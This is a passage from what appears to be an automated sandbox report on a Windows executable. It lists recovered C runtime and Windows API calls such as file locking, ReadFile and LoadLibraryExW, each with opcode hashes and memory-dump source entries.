                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F0A47560421DB6CB34BA6CDC55AFE77ECDF02350F1008A5FA1493191DFB18B88C6A4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __lock_file_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 26237723-0
                                                                                                                                                                                                              • Opcode ID: 2420b94be2afd3ec2679ea807bcc372de496b65b0d96b763e814b870c116d75a
                                                                                                                                                                                                              • Instruction ID: 3f123ff9c9cbd03dc7c29c70ed8a5f354fd3c22ad1555cd5835d593a7c0f8267
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2420b94be2afd3ec2679ea807bcc372de496b65b0d96b763e814b870c116d75a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2014471800A4DEBCF21AF66CC019BE7BE1AF807A0F144195BB245B1A1DB318A29DF91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF8D58: __getptd_noexit.LIBCMT ref: 00BF8D58
                                                                                                                                                                                                              • __lock_file.LIBCMT ref: 00BF560B
                                                                                                                                                                                                                • Part of subcall function 00BF6E3E: __lock.LIBCMT ref: 00BF6E61
                                                                                                                                                                                                              • __fclose_nolock.LIBCMT ref: 00BF5616
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2800547568-0
                                                                                                                                                                                                              • Opcode ID: 2f22d7da9ac2951372088e59b94b632ca2bd7f6ce97a430a06fcf8be91bbe363
                                                                                                                                                                                                              • Instruction ID: a46287e835ea807ee75b3db99d3fe38a387c199e4d0e6099ede8e5b48fa82f5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f22d7da9ac2951372088e59b94b632ca2bd7f6ce97a430a06fcf8be91bbe363
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F09071901B0DAAD7206B698C0277E67E16F50334F118289AB24AB1C1CB7C49099B51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __lock_file.LIBCMT ref: 00BF5EB4
                                                                                                                                                                                                              • __ftell_nolock.LIBCMT ref: 00BF5EBF
                                                                                                                                                                                                                • Part of subcall function 00BF8D58: __getptd_noexit.LIBCMT ref: 00BF8D58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2999321469-0
                                                                                                                                                                                                              • Opcode ID: 5489021b9f1661fd6636a018e0f91927534acf55fae6dea5cc77576e08a10f10
                                                                                                                                                                                                              • Instruction ID: ffd717f8a940f3c8fb35ca0b2ad71ce29f039a3ed0be3b3d6e36939123b71deb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5489021b9f1661fd6636a018e0f91927534acf55fae6dea5cc77576e08a10f10
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F0EC7191161D9ADB10BB748C0377E76D06F11331F1142C5B724AF1C2CF784E499B55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InitializeCriticalSectionEx.KERNEL32(00BF1003,?,?,?,00BF9F3B,00000000,00000FA0,00000000,00C8CE28,00000008,00BF9E52,00BF1003,00BF1003,?,00BF9CAC,0000000D), ref: 00BFA074
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00BF1003,?,?,00BF9F3B,00000000,00000FA0,00000000,00C8CE28,00000008,00BF9E52,00BF1003,00BF1003,?,00BF9CAC,0000000D), ref: 00BFA07E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalInitializeSection$CountSpin
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4156364057-0
                                                                                                                                                                                                              • Opcode ID: bbf64d7d37b2297a22ccc125109321b47073497ccfb3e999d83593a87a6902a3
                                                                                                                                                                                                              • Instruction ID: 9378bb4546f5a02e2d5344d526847c9f2090924f762573223a271d683f0cd404
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbf64d7d37b2297a22ccc125109321b47073497ccfb3e999d83593a87a6902a3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD0673205414CBFCF129FE5EC08AAD3FAAFF48256B408461F91C8A130D772E565AB40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,?,?,00BE3BAB,00C60980,?,00C60980,?,?), ref: 00BE1266
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,?,?,00BE3BAB,00C60980,?,00C60980,?,?), ref: 00BE1299
                                                                                                                                                                                                                • Part of subcall function 00BE1364: _memmove.LIBCMT ref: 00BE13A0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3033907384-0
                                                                                                                                                                                                              • Opcode ID: 51c1ac1cd817326bdf09d3dd1ae6b67c433e51d4a987a9bbf16d8d34ec8e3d7c
                                                                                                                                                                                                              • Instruction ID: cd11bcbf1d53c7ab7ee196d874c906eef09cc7a459ead88b74c1a2cc908dd9a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51c1ac1cd817326bdf09d3dd1ae6b67c433e51d4a987a9bbf16d8d34ec8e3d7c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0501A2312051447FEB246A26DC46FBF3B9CEB85360F20846AFA05DE191DA70D800C661
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000), ref: 00BE41B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              • Opcode ID: b6b0f84c3a7cd2687f1affad56763fb2c2ced8df6de576ec44bc307b5d2941c8
                                                                                                                                                                                                              • Instruction ID: b79a5c5234284821220937624ed06a532a38808a451d2791b70b530d5637ab0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b0f84c3a7cd2687f1affad56763fb2c2ced8df6de576ec44bc307b5d2941c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E315C71A00696AFCF18CF2EC88465DBBF1FF54310F158659E815A3710D770B9A4CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                                                              • Opcode ID: 4aff6951a90154bdd45f788d5aae0b59fa55f4d273d3e3e58e84bdddc62174bc
                                                                                                                                                                                                              • Instruction ID: 6e01c1d8e8dc10a642c1d78b480bcbb5fda64ab1284875008d4e28724187790f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4aff6951a90154bdd45f788d5aae0b59fa55f4d273d3e3e58e84bdddc62174bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4410674508351DFDB24DF14C484B1AFBE1BF45308F1988ADE8999B362D771E885CB52
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00BE4B63
                                                                                                                                                                                                                • Part of subcall function 00BF547B: __wfsopen.LIBCMT ref: 00BF5486
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BE27AF,?,00000001), ref: 00BE49F4
                                                                                                                                                                                                                • Part of subcall function 00BE4ADE: FreeLibrary.KERNEL32(00000000), ref: 00BE4B18
                                                                                                                                                                                                                • Part of subcall function 00BE48B0: _memmove.LIBCMT ref: 00BE48FA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1396898556-0
                                                                                                                                                                                                              • Opcode ID: 9021ac61dd728912ea3717bcba5127d7aadd64f34b285f4faa8df95728091f46
                                                                                                                                                                                                              • Instruction ID: 63fafd4c6769c8616ebf17b146e409c42bf1f9f832f5e402440377dfb079c13e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9021ac61dd728912ea3717bcba5127d7aadd64f34b285f4faa8df95728091f46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2211E731650245ABCB20FF71CC46FAE77E9DF40711F204479F541A61C2EBB09A11AB98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                                                              • Opcode ID: 456bb31d2d5b16ed8a74a2f1b2f295a06c1d0b525de14df705f1af9ffbaa3b87
                                                                                                                                                                                                              • Instruction ID: a1930eee2a821f682f657e7b755e82412ff0895e1a6d8b168fe4f823eabd0fef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 456bb31d2d5b16ed8a74a2f1b2f295a06c1d0b525de14df705f1af9ffbaa3b87
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C421F2B4508341DFDB24DF54C484B1ABBE1BF85304F0589ADF98A57762D731E849CB92
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000), ref: 00BE4276
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                              • Opcode ID: c61d0bcb423c3cdb480597df4966daba311c78486e7df702507faa05f9fc5937
                                                                                                                                                                                                              • Instruction ID: 600b5067838948a1db565b80fdcd5ea90b92d50f440b25a69755a323af61b2e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c61d0bcb423c3cdb480597df4966daba311c78486e7df702507faa05f9fc5937
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33114831210B419FD730CF56C880B66B7F9EF88710F10C96EEAAA86A50D7B0F845CB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3048848545-0
                                                                                                                                                                                                              • Opcode ID: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
                                                                                                                                                                                                              • Instruction ID: 55536b42ecbd36eff32372cbaab31e1dcc0e8436fd066e50e69503afd478015d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFE0E53221C3502A9915271E9C8287EB3DDDF8573032006ABF401972D2DFA2694651B5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _fseek
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2937370855-0
                                                                                                                                                                                                              • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                              • Instruction ID: fcee56237475c4ce0685ec88ca9da78a2ea5ec91c31f939c1326868972b409a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83F08CB6400208BFDF109F45DC00CEB7BB9EB85320F104198F9145A111D332EA259BA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00BE27AF,?,00000001), ref: 00BE4A63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                              • Opcode ID: d3ad36fc0da18de1f04e44e9cbff8cf8a82cafa42234448af63af3c724ff993a
                                                                                                                                                                                                              • Instruction ID: a31249d21a1545f8008195a4a9ea58aea396701bdb3c076aab79d14aa00d10d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ad36fc0da18de1f04e44e9cbff8cf8a82cafa42234448af63af3c724ff993a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F01571145751CFCB349F66E49482ABBF0EF14326320A9BEE2D683610C7719984DF44
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                              • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                                                                              • Instruction ID: 1798f04e763d1b598f081f375f28474e00fac0a3d597f6d492a7c64eb5e6680e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71F0F87240020DFFDF05DF94C941EAABBB9FB14314F208589F9198B212D376DA61ABA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32 ref: 00BF09E4
                                                                                                                                                                                                                • Part of subcall function 00BE1821: _memmove.LIBCMT ref: 00BE185B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongNamePath_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2514874351-0
                                                                                                                                                                                                              • Opcode ID: d63ace2f1f96c6724804c19ac4672f68e0ccd070b595a179a9386bf0de8ffe67
                                                                                                                                                                                                              • Instruction ID: 0718b5fcaf174bf47348965f37fdc573b01066eafe17196a20474b997f51935d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d63ace2f1f96c6724804c19ac4672f68e0ccd070b595a179a9386bf0de8ffe67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79E0863290012857C721A6999C05FEEB7DDDB89791F1401B6FD08D7354DA609D818691
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3048848545-0
                                                                                                                                                                                                              • Opcode ID: 01ba6ddc6cddd93f3ff0b052877d521ff508d5553d846749dbb24c7369dbd345
                                                                                                                                                                                                              • Instruction ID: d2d4e83c568770ac0b3ff2a0e65c5a990a22983898c075b13c4b7f198a6e2b84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ba6ddc6cddd93f3ff0b052877d521ff508d5553d846749dbb24c7369dbd345
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DD0A73375211426E629323D6C07C7F449CCBC26A0B0510BEF702CB1E2ED504C0600A0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BD29F3
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000007,?,00000000,00000000,FFFFFFFF,?,?,00BD1ECA,?,?,?), ref: 00BD1A87
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
